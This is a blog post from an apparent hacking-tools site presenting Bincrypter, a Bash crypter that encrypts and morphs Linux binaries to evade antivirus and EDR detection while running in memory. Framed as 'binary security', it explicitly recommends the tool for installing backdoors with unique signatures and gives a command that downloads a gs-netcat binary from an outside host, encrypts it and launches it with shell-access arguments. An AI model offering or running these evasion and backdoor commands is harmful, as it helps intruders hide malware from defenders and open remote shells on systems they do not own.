Hacking Tools

Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to obfuscate and encrypt ELF binaries and #!-scripts, providing a robust layer of protection against reverse engineering and detection by antivirus and endpoint detection and response (EDR) systems.

Key Features Of Bincrypter

  • Obfuscation and Encryption: Bincrypter can encrypt and obfuscate any ELF binary or #!-script, making it difficult for attackers to reverse-engineer the code. The resulting binary is heavily obfuscated, with strings appearing as garbage, which complicates analysis.
  • AV/EDR Evasion: The tool employs morphing techniques to change the binary’s signature every time it is executed. This makes it challenging for AV/EDR systems to detect the binary as malicious, as its signature is always different.
  • In-Memory Operation: Bincrypter operates entirely in memory without creating temporary files. This ensures that the filesystem remains clean and reduces the risk of leaving behind evidence of its use.
  • Multi-Layer Encryption: It supports double or triple encryption of the same binary, further enhancing its security features. This allows for multiple layers of protection against unauthorized access.
  • Architecture Agnostic: Bincrypter is compatible with various architectures, including x86_64, aarch64, arm6, and mips. This versatility makes it suitable for use across different platforms.
  • Living Off the Land (LOTL): The tool relies only on standard system tools like /bin/sh, perl, and openssl, which are typically available on most Linux systems. This approach minimizes dependencies and makes it easier to deploy in various environments.

To use Bincrypter, you can download the script from GitHub and execute it with the binary you want to encrypt. Here’s an example:

bash# Download the script
curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh
chmod +x bincrypter.sh

# Encrypt the 'id' binary
cp /usr/bin/id id
./bincrypter.sh id

# Optionally, set a custom password
cp /usr/bin/id id
./bincrypter.sh id foobar

Bincrypter can be used in scenarios where maintaining the integrity and confidentiality of binaries is crucial. For instance, it can be used to install backdoors with unique signatures, making them harder to detect:

bashcurl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter.sh >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc

Bincrypter is a versatile tool for protecting Linux binaries from reverse engineering and detection.

Its ability to operate in memory, support multiple encryption layers, and evade AV/EDR systems makes it a valuable asset in maintaining binary security.

However, like any powerful tool, it should be used responsibly and ethically.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

SpyAI : Intelligent Malware With Advanced Capabilities

SpyAI is a sophisticated form of malware that leverages advanced technologies to capture and analyze…

3 days ago

Proxmark3 : The Ultimate Tool For RFID Security And Analysis

The Proxmark3 is a versatile, open-source tool designed for radio-frequency identification (RFID) security analysis, research,…

3 days ago

Awesome Solana Security : Enhancing Program Development

The "Awesome Solana Security" collection is a comprehensive resource designed to help developers build more…

3 days ago

IngressNightmare-POCs : Understanding The Vulnerability Exploitation Flow

The "IngressNightmare" vulnerabilities, disclosed in March 2025, represent a critical set of security issues affecting…

3 days ago

AdaptixC2 : Enhancing Penetration Testing With Advanced Framework Capabilities

AdaptixC2 is an advanced post-exploitation and adversarial emulation framework designed specifically for penetration testers. It…

3 days ago

Endpoint With Missing Agents : Identifying And Managing Security Gaps

Endpoint security is crucial for protecting organizations from cyber threats. However, managing endpoint agents can…

3 days ago